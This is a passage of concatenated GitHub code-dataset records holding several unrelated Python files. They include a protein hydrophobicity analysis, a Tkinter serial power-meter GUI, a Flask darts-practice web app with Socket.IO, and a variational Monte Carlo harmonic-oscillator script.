json.load(handle)\n\n hydrophobicity = {'A':.41,'R':-.14,'N':-.28,'D':-.55,'C':.49,'E':-.31,\n 'Q':-.1,'G':0,'H':0.08,'I':.99,'L':.97,'K':-.23,'M':.74,\n 'F':1.0,'P':-.46,'S':-.05,'T':.13,'W':.97,'Y':.63,'V':.76}\n\n avg_rel_hyd = {}\n \n for comp in complex_residues:\n vals = [hydrophobicity[aa] for aa in complex_residues[comp]]\n mean = sum(vals) / len(vals)\n avg_rel_hyd[comp.upper()] = mean\n \n planarity = {}\n with open(\"planarity_results.csv\", \"r\") as handle:\n for line in handle:\n line = line.strip(\"\\n\").split(\",\")\n if line[0] != \"5H7I\":\n planarity[line[0]] = line[1]\n\n planars = [avg_rel_hyd[comp] for comp in planarity if planarity[comp] == \"planar\"]\n nonplanars = [avg_rel_hyd[comp] for comp in planarity if planarity[comp] == \"nonplanar\"]\n \n\n with open(\"hydrophobicity_by_planarity.csv\", \"w\") as out:\n out.write(\"planars,nonplanars\")\n out.write(\"\\n\")\n for idx, num in enumerate(planars):\n try:\n out.write(\",\".join([str(num), str(nonplanars[idx])]))\n out.write(\"\\n\")\n except IndexError:\n out.write(\",\".join([str(num), \"NA\"]))\n out.write(\"\\n\")\n\n","repo_name":"wigasper/ddi-planarity","sub_path":"analysis/hydrophobicity_analysis.py","file_name":"hydrophobicity_analysis.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5394781945","text":"import re\nimport 
io\n\ncamel_to_snake_pattern = re.compile(\"(.)([A-Z][a-z]+)\")\ncamel_to_snake_pattern2 = re.compile(\"([a-z0-9])([A-Z])\")\n\n\ndef camel_to_snake(name):\n # name = re.sub(\"(.)([A-Z][a-z]+)\", r\"\\1_\\2\", name)\n # return re.sub(\"([a-z0-9])([A-Z])\", r\"\\1_\\2\", name).lower()\n name = camel_to_snake_pattern.sub(r\"\\1_\\2\", name)\n return camel_to_snake_pattern2.sub(r\"\\1_\\2\", name).lower()\n\n\ndef iterable_to_stream(\n iterable, buffer_size=io.DEFAULT_BUFFER_SIZE\n) -> io.BufferedReader:\n \"\"\"\n Lets you use an iterable (e.g. a generator) that yields bytestrings as a read-only\n input stream.\n\n The stream implements Python 3's newer I/O API (available in Python 2's io module).\n For efficiency, the stream is buffered.\n \"\"\"\n\n class IterStream(io.RawIOBase):\n def __init__(self):\n self.leftover = None\n\n def readable(self):\n return True\n\n def readinto(self, b):\n try:\n length = len(b) # We're supposed to return at most this much\n chunk = self.leftover or next(iterable)\n output, self.leftover = chunk[:length], chunk[length:]\n b[: len(output)] = output\n return len(output)\n except StopIteration:\n return 0 # indicate EOF\n\n return io.BufferedReader(IterStream(), buffer_size=buffer_size)\n\n\nclass RequiredParameterCheck(object):\n \"\"\"A decorator that checks if at least on named parameter is present\"\"\"\n\n MODE_OR = 0\n MODE_AND = 1\n\n def __init__(self, required, mode=MODE_OR):\n self.required = sorted(required)\n self.mode = mode\n\n def __call__(self, func):\n def wrapper(*args, **kwargs):\n found_paramater = sorted([req for req in self.required if req in kwargs])\n if self.mode == self.MODE_OR and found_paramater:\n return func(*args, **kwargs)\n elif self.mode == self.MODE_AND and found_paramater == self.required:\n return func(*args, **kwargs)\n else:\n raise ValueError(\n f\"Required parameter `{', '.join(self.required)}` is missing.\"\n )\n\n wrapper.__name__ = func.__name__\n wrapper.__dict__.update(func.__dict__)\n wrapper.__doc__ = func.__doc__\n return wrapper\n","repo_name":"FORMOBILE/CLOUDxTRACT","sub_path":"src/extractor/common/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"29926040492","text":"\"\"\"Routes configuration\n\nThe more specific and detailed routes should be defined first so they\nmay take precedent over the more generic routes. 
For more information\nrefer to the routes manual at http://routes.groovie.org/docs/\n\"\"\"\nfrom routes import Mapper\n\ndef make_map(config):\n \"\"\"Create, configure and return the routes Mapper\"\"\"\n map = Mapper(directory=config['pylons.paths']['controllers'],\n always_scan=config['debug'])\n map.minimization = False\n\n # The ErrorController route (handles 404/500 error pages); it should\n # likely stay at the top, ensuring it can always be resolved\n map.connect('/error/{action}', controller='error')\n map.connect('/error/{action}/{id}', controller='error')\n\n # CUSTOM ROUTES HERE\n\n map.connect('home', '/', controller='home', action='index')\n # proxied items\n map.connect('about', '/about', controller='home', action='about')\n map.connect('get-involved', '/get-involved', controller='home',\n action='get_involved')\n\n map.connect('proxy', '/proxy', controller='proxy', action='index')\n map.connect('sparql', '/sparql', controller='sparql', action='index')\n map.connect('search', '/search', controller='search', action='index')\n map.connect('graph', '/graph', controller='graph', action='index')\n map.connect('add', '/add', controller='graph', action='add')\n map.connect('import', '/import', controller='remote', action='index')\n map.connect('uuid', '/api/uuidalloc', controller='uuidalloc', action='index')\n\n map.connect(\"isbn\", \"/isbn/{isbn}\", controller=\"isbn\", action=\"index\")\n map.connect(\"isbn\", \"/isbn\", controller=\"isbn\", action=\"index\")\n\n map.connect(\"collection\", \"/collection/search\", controller=\"collection\",\n action=\"search\")\n map.connect(\"collection\", \"/collection/\", controller=\"collection\",\n action=\"create\",\n conditions=dict(method=['POST']))\n map.connect(\"collection\", \"/collection/{collection}\", controller=\"collection\",\n action=\"update\",\n conditions=dict(method=['POST']))\n map.connect(\"collection\", \"/collection/{collection}\", controller=\"collection\", action=\"index\")\n map.connect(\"collection\", \"/collection\", controller=\"collection\", action=\"index\")\n\n map.connect(\"modeview\", \"/modelview\", controller=\"modelview\", action=\"index\")\n\n # map.connect(\"changeset\", \"/changeset/{changeset}\", \n # controller=\"changeset\", action=\"view\")\n map.connect(\"changesets\", \"/changeset\", \n controller=\"changeset\", action=\"index\")\n\n map.connect('/account', controller='account', action='index')\n map.connect('/account/login', controller='account', action='login')\n map.connect('/account/logout', controller='account', action='logout')\n map.connect('/account/{username}', controller='account', action='view')\n\n # for the time being catch everything but soon we will be more specific\n # e.g. 
restrict to work|person|entity ...\n map.connect('/*path', controller='graph', action='index')\n\n return map\n","repo_name":"rufuspollock/openbiblio-old","sub_path":"openbiblio/config/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40005952171","text":"# --------3.4 Tower Of Hanoi Problem--------\nclass Node:\n def __init__(self, val, nextNode = None):\n self.val = val\n self.nextNode = nextNode\n \nclass Stack:\n def __init__(self, name):\n self.top = None\n self.name = name\n self.length = 0\n def push(self, val):\n n = Node(val)\n n.nextNode = self.top\n self.top = n\n self.length += 1\n return self\n \n def pop(self):\n val = self.top.val\n if(self.top !=None ):\n self.top = self.top.nextNode\n self.length -= 1\n # print(\"The length of the stack after pop is \", self.length)\n else:\n self.top = None\n return val\n \n def show(self):\n temp = self.top\n while(temp):\n print(\"Value in stack \", self.name, \" : \",temp.val)\n temp = temp.nextNode\n\ndef toh(n, fromStack, toStack, auxStack):\n if(n == 1):\n toStack.push(fromStack.pop())\n print(\"Move \", n)\n return \n toh(n-1, fromStack, auxStack, toStack)\n print(\"Move \", n)\n toStack.push(fromStack.pop())\n toh(n-1, auxStack, toStack, fromStack)\n \nstackA = Stack(\"A\")\nstackB = Stack(\"B\")\nstackC = Stack(\"C\")\nn = int(input())\nfor i in range(n,0, -1 ):\n stackA.push(i)\ntoh(n, stackA, stackC, stackB)\nstackA.show()\nstackB.show()\nstackC.show()\n","repo_name":"Aman-Malhotra/Cracking_The_Coding_Interview_Book_Solutions_PYTHON","sub_path":"3/3.4.py","file_name":"3.4.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73567262453","text":"import tkinter as tk\r\nfrom tkinter import *\r\nimport serial\r\nimport serial.tools.list_ports\r\nimport time\r\nimport threading\r\nimport numpy as np\r\n\r\nglobal meters_exists, meters_single, meters_cont, measurements\r\n\r\nBAUD = 19200\r\nlaunch_time = time.time()\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Power Measurement\")\r\n\r\n\r\n# Method to offload continuous polling of device to Daemon Thread\r\ndef MeasureOnThread(COM, entry, idx):\r\n global is_on\r\n\r\n ser = serial.Serial(COM, BAUD, timeout=.1)\r\n start = time.time()\r\n\r\n # While the continuous run button is still on, keep reading!\r\n while is_on[idx]:\r\n ser.write(b'v')\r\n output = ser.readline()\r\n entry.delete(0, \"end\")\r\n entry.insert(0, output.decode() + \" dB\")\r\n # entry.insert(0, str(round((time.time()-start), 2)) + \" dBm\") # for debugging!!!\r\n time.sleep(.1)\r\n ser.close()\r\n\r\n\r\n# Method to take Single Measurement of selected meter\r\ndef TakeSingleMeasurement(COM, entry, idx):\r\n if not is_on[idx]:\r\n ser = serial.Serial(COM, BAUD, timeout=.1)\r\n ser.write(b'v')\r\n output = ser.readline()\r\n entry.delete(0, \"end\")\r\n entry.insert(0, output.decode() + \" dB\")\r\n # entry.insert(0, time.time()-launch_time) # for debugging!!!\r\n ser.close()\r\n\r\n\r\n# Method to start Continuous Measurement of selected meter\r\ndef TakeContMeasurement(COM, entry, this_button, idx, set_all):\r\n global is_on\r\n if not is_on[idx]:\r\n is_on[idx] = True\r\n this_button.config(fg=\"black\", bg=\"yellow\")\r\n\r\n # Why did I use a Daemon Thread?\r\n # Because it closes the serial connection upon closing the program.\r\n # Bad Programming Practice? 
Maybe.\r\n # Solves the problem? Also, maybe.\r\n t1 = threading.Thread(daemon=True, target=MeasureOnThread, args=(COM, entry, idx))\r\n t1.start()\r\n elif not set_all:\r\n is_on[idx] = False\r\n this_button.config(fg=\"black\", bg=\"white\")\r\n\r\n\r\n# Method to stop Continuous Measurement of selected meter\r\ndef StopContMeasurement(this_button, idx):\r\n is_on[idx] = False\r\n this_button.config(fg=\"black\", bg=\"white\")\r\n\r\n\r\n# Method to start Continuous Measurement of all active meters\r\ndef TakeContMeasurementAll(comlist):\r\n global meters_exists, measurements, meters_cont, is_on\r\n for idx in range(len(meters_exists)):\r\n if meters_exists[idx]:\r\n com = checklist[idx].cget('text')\r\n TakeContMeasurement(com, measurements[idx], meters_cont[idx], idx, True)\r\n\r\n\r\n# Method to stop Continuous Measurement of all active meters\r\ndef StopContMeasurementAll(comlist):\r\n global meters_exists, measurements, meters_cont, is_on\r\n for idx in range(len(meters_exists)):\r\n if meters_exists[idx] and is_on[idx]:\r\n com = checklist[idx].cget('text')\r\n StopContMeasurement(meters_cont[idx], idx)\r\n\r\n\r\n# Method to take Single Measurement of all active meters\r\ndef TakeSingleMeasurementAll(comlist):\r\n global meters_exists, measurements, meters_single\r\n for idx in range(len(meters_exists)):\r\n if meters_exists[idx]:\r\n com = checklist[idx].cget('text')\r\n TakeSingleMeasurement(com, measurements[idx], idx)\r\n\r\n\r\n# Adds GUI objects when COM is checked\r\ndef DisplayMeasurementGUI(COM, idx):\r\n global meters_single, meters_cont, measurements\r\n\r\n # tk.Entry for measurement output\r\n measurements[idx] = tk.Entry(justify=\"center\")\r\n measurements[idx].insert(0, \"dB\")\r\n measurements[idx].grid(row=idx, column=1)\r\n\r\n # tk.Button for single measure\r\n meters_single[idx] = tk.Button(text=\"Measure\", command=lambda: TakeSingleMeasurement(COM, measurements[idx], idx),\r\n fg=\"black\", bg=\"white\")\r\n meters_single[idx].grid(row=idx, column=2)\r\n\r\n # tk.Button for continuous measure\r\n meters_cont[idx] = tk.Button(text=\"Continuous Measure\",\r\n command=lambda: TakeContMeasurement(COM, measurements[idx],\r\n meters_cont[idx], idx, False),\r\n fg=\"black\", bg=\"white\")\r\n meters_cont[idx].grid(row=idx, column=3, padx=(5, 5), pady=(2, 2))\r\n root.geometry(\"\")\r\n\r\n\r\n# Removes GUI objects when COM is unchecked\r\ndef RemoveMeasurementGUI(COM, idx):\r\n meters_single[idx].grid_remove()\r\n meters_cont[idx].grid_remove()\r\n measurements[idx].grid_remove()\r\n return\r\n\r\n# Whenever checklist is updated, go through and add/remove any buttons\r\ndef UpdateMeters(checklist, varlist):\r\n global meters_exists\r\n for i in range(len(checklist)):\r\n com = checklist[i].cget('text')\r\n if varlist[i].get() == 1 and not meters_exists[i]:\r\n meters_exists[i] = True\r\n DisplayMeasurementGUI(com, i)\r\n elif varlist[i].get() == 0 and meters_exists[i]:\r\n meters_exists[i] = False\r\n RemoveMeasurementGUI(com, i)\r\n\r\n\r\n# Here lies the actual code\r\nports = serial.tools.list_ports.comports() # get all COM ports\r\n\r\n# for keeping track of selected COM ports\r\nchecklist = np.empty(shape=(len(ports),), dtype=tk.Checkbutton)\r\nvarlist = np.empty(shape=(len(ports),), dtype=IntVar)\r\n\r\n# is_on - for all COM ports, if continuous read is on\r\n# meters_exist - for all COM ports, if port is checked = True\r\n# meters_single - np.array for single measure tk.Button\r\n# meters_cont - np.array for continuous measure tk.Button\r\n# measurements - 
np.array for measurement output tk.Entry\r\nglobal is_on, meters_exists, meters_single, meters_cont, measurements\r\nis_on = np.full_like(checklist, False)\r\nmeters_exists = np.full_like(checklist, False)\r\nmeters_single = np.empty_like(checklist, dtype=tk.Button)\r\nmeters_cont = np.empty_like(checklist, dtype=tk.Button)\r\nmeasurements = np.empty_like(checklist, dtype=tk.Entry)\r\nports = sorted(ports) # sort in increasing numeric order\r\n\r\n# Placing all the widgets\r\nfor i in range(len(checklist)):\r\n ID = ports[i][0]\r\n varlist[i] = IntVar()\r\n checklist[i] = tk.Checkbutton(root, text=ID, variable=varlist[i], onvalue=1, offvalue=0,\r\n command=lambda: UpdateMeters(checklist, varlist))\r\n checklist[i].grid(row=i, column=0)\r\n\r\n# Single Measure All\r\nsingle_measureAllButton = tk.Button(text=\"Single Measure All\", fg=\"black\", bg=\"white\",\r\n command=lambda: TakeSingleMeasurementAll(checklist))\r\nsingle_measureAllButton.grid(row=len(checklist), column=0, padx=(5, 10), pady=(10, 10))\r\n\r\n# Continuous Measure All start\r\ncont_measureAllButton = tk.Button(text=\"Continuous Measure All\", fg=\"black\", bg=\"white\",\r\n command=lambda: TakeContMeasurementAll(checklist))\r\ncont_measureAllButton.grid(row=len(checklist), column=1, padx=(5, 10), pady=(10, 10))\r\n\r\n# Continuous Measure All stop\r\ncont_measureAllButton_stop = tk.Button(text=\"Stop Measure All\", fg=\"black\", bg=\"white\",\r\n command=lambda: StopContMeasurementAll(checklist))\r\ncont_measureAllButton_stop.grid(row=len(checklist), column=2, padx=(5, 10))\r\n\r\nroot.mainloop()\r\nis_on = False\r\n","repo_name":"jereifej/PM-212_Connection","sub_path":"Connection_GUI.py","file_name":"Connection_GUI.py","file_ext":"py","file_size_in_byte":7149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37039223718","text":"import unittest\nfrom unittest.mock import patch\nfrom code_generator import get_code\nfrom code_generator import get_code_with_day\n\n\nclass TestGetCode(unittest.TestCase):\n\n @patch('random.randint')\n def test_get_code_mock_should_return_3(self, mocked_random):\n mocked_random.return_value = 3\n actual = get_code()\n expected = 'CX-3'\n self.assertEqual(actual, expected)\n\n\nclass TestGetCodeWithDay(unittest.TestCase):\n\n @patch('random.randint')\n def test_get_code_with_day_with_today_date(self, mock_int):\n mock_int.return_value = 5\n actual = get_code_with_day()\n expected = 'CX-5-TUE'\n self.assertEqual(actual, expected)\n\n @patch('code_generator.get_today_name')\n @patch('random.randint')\n def test_get_code_with_day_with_mocked_friday(self, mock_int, mock_day):\n mock_int.return_value = 5\n mock_day.return_value = 'FRI'\n actual = get_code_with_day()\n expected = 'CX-5-FRI'\n self.assertEqual(actual, expected)\n\n @patch('code_generator.get_today_name')\n @patch('random.randint')\n def test_get_code_with_day_with_mocked_sunday(self, mock_int, mock_day):\n mock_int.return_value = 5\n mock_day.return_value = 'SUN'\n actual = get_code_with_day()\n expected = 'CX-5-SUN'\n self.assertEqual(actual, expected)\n\n","repo_name":"adrian88szymanski/Python_project","sub_path":"Python_Unittest/12_mocking/04_project/test_code.py","file_name":"test_code.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40791684859","text":"from functools import wraps\nfrom hashlib import sha256\nimport os\nimport uuid\nfrom flask import Flask, session, 
jsonify, request, render_template, redirect, url_for, make_response, flash\nfrom flask_cors import CORS, cross_origin\nfrom flask_login import LoginManager\nfrom flask_socketio import SocketIO, emit, join_room\nfrom flask_uuid import FlaskUUID\nfrom werkzeug.exceptions import abort\n\n\nfrom src.models.database import Database\nfrom src.models.user import User\nfrom src.models.aroundtheboard import AroundTheWorld\nfrom src.models.dartsat import DartsAt\nfrom src.models.bobs27 import Bobs27\n\napp = Flask(__name__)\nFlaskUUID(app)\n__author__ = 'jamie'\n\nMONGODB_URI = os.environ.get('MONGO_URL')\n\n\napp.secret_key = os.urandom(24)\n\nsocketio = SocketIO(app)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\nmatch = None\n\nconnected_users = list()\nopponent = None\n\n\ndef ssl_required(fn):\n @wraps(fn)\n def decorated_view(*args, **kwargs):\n return redirect(request.url.replace(\"http://\", \"https://\"))\n\n return decorated_view\n\n\ndef loggedin(function):\n @wraps(function)\n def wrapper():\n if 'name' in session:\n return make_response(function())\n else:\n abort(401)\n return wrapper\n\n\ndef setup_database():\n Database.initialize(MONGODB_URI)\n\n\n@app.route('/')\ndef home_page():\n\n if 'email' in session:\n return render_template(\"index.html\", message=\"You are logged in as \" + session['name'])\n return render_template(\"index.html\")\n\n\n@app.route('/register')\ndef register_page():\n return render_template(\"register.html\")\n\n\n@app.route('/login')\ndef login_page():\n return render_template(\"login.html\")\n\n\n@app.route('/player-lobby')\n@loggedin\ndef player_lobby():\n return render_template(\"player-lobby.html\")\n\n\n@app.route('/games')\n@loggedin\ndef games_list():\n return render_template(\"games.html\")\n\n\n@app.route('/around-the-board', methods=['GET'])\n@loggedin\ndef around_the_board_page():\n mode = request.args.get('mode')\n\n if mode in (\"Any\", \"Single\", \"Double\", \"Treble\"):\n return render_template(\"around-the-board.html\", mode=mode)\n else:\n abort(403)\n\n\n@app.route('/100-darts-at', methods=['GET'])\n@loggedin\ndef darts_at_page():\n mode = request.args.get('mode')\n if mode in (\"20\", \"19\", \"18\", \"17\", \"16\", \"15\", \"Bull\"):\n return render_template(\"100-darts-at.html\", mode=mode)\n else:\n abort(403)\n\n\n@app.route('/bobs-27')\n@loggedin\ndef bobs_27_page():\n return render_template(\"bobs-27.html\")\n\n\n@app.route('/profile')\n@loggedin\ndef profile_page():\n return render_template(\"profile.html\")\n\n\n@app.route('/stats/100-darts-at')\n@loggedin\ndef darts_at_stats():\n player = session['name']\n games = DartsAt.get_games(player)\n return render_template(\"darts-at-overall.html\", dartsAt=games)\n\n\n@app.route('/stats/around-the-board')\n@loggedin\ndef around_the_board_stats():\n player = session['name']\n games = AroundTheWorld.get_games(player)\n return render_template(\"around-the-board-overall.html\", aroundTheBoard=games)\n\n\n@app.route('/stats/bobs-27')\n@loggedin\ndef bobs_27_stats():\n player = session['name']\n games = Bobs27.get_games(player)\n return render_template(\"bobs-27-overall.html\", bobs27=games)\n\n\n@app.route('/bobs-27-summary', methods=['GET'])\n@loggedin\ndef bobs_27_summary():\n game_id = request.args.get('game_id')\n game = Bobs27.get_by_id(uuid.UUID(game_id))\n hitsOnEachNumberDict = game['hitsOnEachNumber']\n hitsOnNumber = []\n hitsOnNumber.append(hitsOnEachNumberDict['1'])\n 
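# string keys, so each hit count is appended explicitly to keep board order (1-20, then Bull)\n    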
# iterate over an explicit ordered key list for the remaining numbers ('1' was\n    # appended just above): the dict keys are strings, so the dict's own key order\n    # can't be relied on for board order\n    for key in [str(n) for n in range(2, 21)] + ['Bull']:\n        hitsOnNumber.append(hitsOnEachNumberDict[key])\n    return render_template('bobs-27-summary.html', game=game, hits=hitsOnNumber)\n\n\n@app.route('/darts-at-summary', methods=['GET'])\n@loggedin\ndef darts_at_summary():\n    game_id = request.args.get('game_id')\n    game = DartsAt.get_by_id(uuid.UUID(game_id))\n\n    return render_template('darts-at-summary.html', game=game)\n\n\n@app.route('/around-the-board-summary', methods=['GET'])\n@loggedin\ndef around_the_board_summary():\n    game_id = request.args.get('game_id')\n    game = AroundTheWorld.get_by_id(uuid.UUID(game_id))\n    dartsThrownAtDict = game['numberOfDartsAtEachNumber']\n    dartsThrownAt = []\n    dartsThrownAtLabels = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16',\n                           '17', '18', '19', '20', 'Bull']\n\n    # the keys are strings, so iterate over the explicit ordered label list above\n    # rather than relying on the dict's own key order\n    for key in dartsThrownAtLabels:\n        dartsThrownAt.append(dartsThrownAtDict[key])\n\n    return render_template(\"around-the-board-summary.html\", game=game, dartsThrownAt=dartsThrownAt, dartsThrownAtLabels\n                           =dartsThrownAtLabels)\n\n\n@app.route(\"/update/100-darts-at\", methods=[\"POST\"])\n@cross_origin()\ndef update_darts_at():\n    _id = uuid.uuid4()\n    data = request.get_json()\n    player = session['name']\n    dartsThrown = data['dartsThrown']\n    score = data['score']\n    points = data['points']\n    number = data['number']\n    miss = data['miss']\n    single = data['single']\n    double = data['double']\n    treble = data['treble']\n    if DartsAt.add_game(_id, player, dartsThrown, score, points, number, miss, single, double, treble):\n        return jsonify({\"message\": \"Done\", \"id\": _id}), 200\n    else:\n        return jsonify({\"error\": \"The data could not be saved\"}), 201\n\n\n@app.route(\"/update/bobs-27\", methods=[\"POST\"])\n@cross_origin()\ndef update_bobs_27():\n    _id = uuid.uuid4()\n    data = request.get_json()\n    player = session['name']\n    score = data['score']\n    hitsOnEachNumber = data['hitsOnEachNumber']\n    if Bobs27.add_game(_id, player, score, hitsOnEachNumber):\n        return jsonify({\"message\": \"Done\", \"id\": _id}), 200\n    else:\n        return jsonify({\"error\": \"The data could not be saved\"}), 201\n\n\n@app.route(\"/update/around-the-board\", methods=[\"POST\"])\n@cross_origin()\ndef update_around_the_board():\n    _id = uuid.uuid4()\n    data = request.get_json()\n    player = session['name']\n    mode = data['mode']\n    numberOfDarts = data['numberOfDarts']\n    dartsAtEachNumber = data['dartsAtEachNumber']\n\n    if AroundTheWorld.add_game(_id, player, numberOfDarts, dartsAtEachNumber, mode):\n        return jsonify({\"message\": \"Game Saved!\", \"id\": _id}), 200\n    else:\n        return jsonify({\"error\": \"The data could not be saved\"}), 201\n\n\n@app.route('/auth/register', methods=[\"POST\"])\n@cross_origin()\ndef register_user():\n    name = request.form['username']\n    password = sha256(request.form['password'].encode('utf-8')).hexdigest()\n    email = request.form['email']\n    if User.register_user(name, password, email):\n        session['name'] = name\n        return redirect(url_for('home_page'))\n    else:\n        flash(\"This user already exists\")\n        return redirect(url_for('register_page'))\n\n\n@app.route('/auth/login', methods=[\"POST\"])\n@cross_origin()\ndef login_user():\n    user_name = request.form['username']\n    user_password = request.form['password']\n\n    if User.check_login(user_name, user_password):\n        session['name'] = user_name\n        return jsonify({\"message\": \"Logged In!\", \"username\": session['name']}), 200\n    else:\n        
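# NB: 201 (\"Created\") is a success status; the frontend presumably branches on\n        # the 201 code itself to detect failures (assumption). A conventional API would\n        # respond with 401 for a failed login.\n        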
return jsonify({\"error\": \"Invalid Username Or Password\"}), 201\n\n\n@app.route('/leaderboards')\ndef leaderboards():\n    around_the_board_leader = AroundTheWorld.get_leaderboard(10)\n    darts_at_leader = DartsAt.get_leaderboard(10)\n    bobs_27_leader = Bobs27.get_leaderboard(10)\n    return render_template('leaderboards.html', around_the_board=around_the_board_leader,\n                           darts_at=darts_at_leader, bobs27=bobs_27_leader)\n\n\n\n@app.route('/logout')\ndef logout():\n    session.clear()\n    return redirect(url_for('home_page'))\n\n\n@socketio.on('joined', namespace='/chat')\ndef joined():\n    user = session['name']\n    join_room(user)\n    connected_users.append(user)\n    emit('status', {'msg': user + ' has entered the room.', 'user': user, 'userlist': connected_users}, broadcast=True)\n\n\n@socketio.on('message', namespace='/chat')\ndef message_received(message):\n    user = session['name']\n    emit('message received', {'message': user + ': ' + message['msg']}, broadcast=True)\n\n\n@socketio.on('playerleft', namespace='/chat')\ndef disconnected():\n    user = session['name']\n    connected_users.remove(user)\n    emit('status', {'msg': user + ' has left the room.', 'user': user, 'userlist': connected_users}, broadcast=True)\n\n\n@socketio.on('challenge_player', namespace='/chat')\ndef challenge_player(player):\n    user = session['name']\n    room = player['player']\n    newroom = user + room\n    join_room(newroom)\n    emit('challenged', {'msg': user + ' has challenged you to 501, accept?', 'player': user, 'newroom': newroom})\n\n\n@socketio.on('matchaccepted', namespace='/chat')\ndef player_accepted(data):\n    join_room(data['room'])\n    matchid = str(uuid.uuid1())\n    url = '/match/' + matchid\n    emit('beginmatch', {'url': url})\n\n\n@socketio.on('setupmatch', namespace='/chat')\ndef setup_match(data):\n    join_room(data['room'])\n    matchid = str(uuid.uuid1())\n    url = '/match/' + matchid\n    emit('beginmatch', {'url': url})\n\n\n@app.route('/player-challenged', methods=['POST'])\ndef match_accepted():\n    json = request.get_json()\n\n    session['opponent'] = json['player']\n    room = json['newroom']\n\n    return jsonify({'room': room})\n\n\n\n\n@app.route('/match/<uuid:match_id>', methods=[\"GET\", \"POST\"])\ndef start_match(match_id):\n    myData = {'name': session['name'],\n              'score': 501,\n              'dartaverage': 0,\n              'doublepercentage': 0\n              }\n\n    theirData = {'name': session['opponent'],\n                 'score': 501,\n                 'dartaverage': 0,\n                 'doublepercentage': 0\n                 }\n\n    matchData = {'id': match_id,\n                 'legs': 5,\n                 'sets': 1\n                 }\n    return render_template(\"match.html\", myData=myData, theirData=theirData, matchData=matchData)\n\n\n@app.before_first_request\ndef init_app():\n    setup_database()\n\n\nif __name__ == \"__main__\":\n    socketio.run(app, host='0.0.0.0', debug=True)\n","repo_name":"jkerr123/darts-scorer","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33627943343","text":"# MONTE CARLO TEST WITH HARMONIC OSCILLATOR IN 1D\n\n# The previous code allowed us to test the algorithm and verify the properties\n# of the local kinetic energy with some plots. However, the variational parameter\n# in the WF had to be changed manually.\n
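#\n# Note: for any normalised trial state Psi_alpha the variational principle gives\n# E(alpha) = <Psi_alpha|H|Psi_alpha> >= E_0, so the best alpha is the one that\n# minimises E(alpha); here the exact ground-state energy is E_0 = 0.5 (natural\n# units), reached at alpha = 1.\n#\n# 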
Now, we actually want to automate the \n# variational procedure to find the best value of alpha via a minimisation of the energy\n\nimport time\nimport numpy as np\nfrom numba import njit\nimport math as m\nimport matplotlib.pyplot as plt\nimport random as rd\n\nN_steps = 50000 # Simulation steps\nN_eq = 5000 # Equilibration steps\n\n# Function to compute the WF\n\n@njit \ndef WF(x, alpha):\n    \n    # We can forget about the normalisation, it comes \"for free\" in MC\n    \n    Psi = m.exp(- x**2 / (2*alpha**2) ) #* 1 / (2*m.pi*alpha**2)**0.5\n    \n    return Psi\n\n# FUNCTION FOR THE METROPOLIS ALGORITHM\n\n@njit\ndef metropolis(x, N_acc, wf2_old, Delta, alpha):\n\n    # First, we need to build a new configuration\n    # We start from the initial one\n\n    new_x = x \n\n    # Variation of position\n\n    rand = rd.uniform(0,1) # Pick random number\n    new_x = x - Delta * (rand - 0.5) # Set new coordinate\n\n    # Now, we must evaluate the acceptance ratio using the ratio of the square moduli of the WFs\n\n    wf2_new = WF(new_x, alpha)**2\n\n    acc = wf2_new / wf2_old\n\n    # Decide acceptance\n\n    xi = rd.uniform(0,1)\n\n    wf2 = wf2_old\n\n    if xi < acc: # new_part becomes part, we accept the MC move\n\n        x = new_x\n\n        N_acc += 1 # Increase the number of accepted moves\n\n        wf2 = wf2_new\n\n    return x, N_acc, wf2\n\n# FUNCTION TO COMPUTE THE POTENTIAL ENERGY \n\n@njit\ndef p_energy(x):\n    \n    p_en = 0.5 * x**2\n    \n    return p_en\n\n# FUNCTION TO COMPUTE THE KINETIC ENERGY\n\n@njit\ndef k_energy(x, alpha):\n    \n    k_en = - 0.5 * (-1 / alpha**2 + x**2 / alpha**4) \n    \n    return k_en\n\n# FUNCTION FOR CALCULATION OF ALL THE ENERGIES WITH REWEIGHTING \n\n@njit\ndef reweighting(alpha, alpha_s, x):\n    \n    l = len(alpha)\n    \n    weight = np.zeros(l)\n    loc_en = np.zeros(l)\n    \n    for i in range(0, l):\n        \n        # compute the weight of each trial alpha relative to the sampling parameter:\n        # weight = |Psi_i / Psi_s|**2, a ratio of probability densities, hence the\n        # squared moduli and no factor 1/2 in the exponent\n        \n        weight[i] = m.exp( -x**2 * ( (1.0/alpha[i]**2) - (1.0/alpha_s**2) ) )\n        #weight[i] = m.exp( x**2 * (alpha[i]-alpha_s)/alpha_s**2)\n        \n        loc_en[i] = (p_energy(x) + k_energy(x, alpha[i])) * weight[i] # Compute energy\n        \n    return weight, loc_en\n\n# FUNCTION TO PERFORM THE ITERATIVE PROCEDURE\n\n#@njit\ndef montecarlo(x):\n    \n    alpha_s = 1.0 # Parameter for which we run the simulation\n    \n    dalpha = np.arange(-0.1, 0.1, 0.01) # Offsets from alpha_s defining the grid of trial parameters\n    \n    # Construct array of variational parameters\n    \n    alpha = np.zeros(len(dalpha)) \n    \n    for i in range(0, len(dalpha)):\n        \n        alpha[i] = alpha_s + dalpha[i]\n    \n    Delta = 4 # Value of parameter for displacement\n\n    # First, the equilibration steps\n\n    wf2 = WF(x, alpha_s)**2 # squared modulus, to match the wf2 values metropolis() compares\n\n    